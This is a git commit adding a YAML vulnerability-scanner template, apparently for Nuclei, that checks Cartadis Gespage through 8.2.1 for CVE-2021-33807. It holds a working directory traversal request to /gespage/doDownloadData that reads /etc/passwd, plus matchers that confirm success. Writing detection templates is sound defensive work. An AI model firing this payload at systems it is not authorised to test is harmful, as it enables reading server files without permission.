Create CVE-2021-33807.yaml

2021-08-16 06:47:24 +07:00 · 2021-08-16 06:47:24 +07:00 · fa8c120f90
parent 03fd413bb1
commit fa8c120f90
1 changed files with 27 additions and 0 deletions
--- a/cves/2021/CVE-2021-33807.yaml
+++ b/cves/2021/CVE-2021-33807.yaml
@ -0,0 +1,27 @@
+id: CVE-2021-33807
+
+info:
+  name: Cartadis Gespage through 8.2.1 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
+  reference: |
+    - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
+  tags: cve,cve2021,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200